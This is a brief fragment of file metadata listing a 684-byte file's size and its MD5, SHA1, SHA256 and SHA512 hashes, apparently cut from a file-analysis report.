SHA512789cfc06f7d3ba3a6db15705be3a0c2037c068a160b273d411ee16656570b082d2bf1aab16f9092310db62ff0eaa0b27e2ed43c9f7a6de7310d1d9d0fd5368f1
-
Filesize
684B
MD52b14e57a22185fd6c4f0eeb78b1f1e4a
SHA14b3c659c59e606e376fc8886060bdfdb0a1ab060
SHA2561a329de0b81510e5258d8f14bf6ef9ac9394275b390196a23f9be4911f986439
SHA5124dc8c934bcecfb2cfc5ad525bf40f2bcd7f563feb08bf57b1dd06b7f942236913107e5badb9fc7128e6879c089aef9bb492b5026bf01a0bcba1b0fb57b4b7312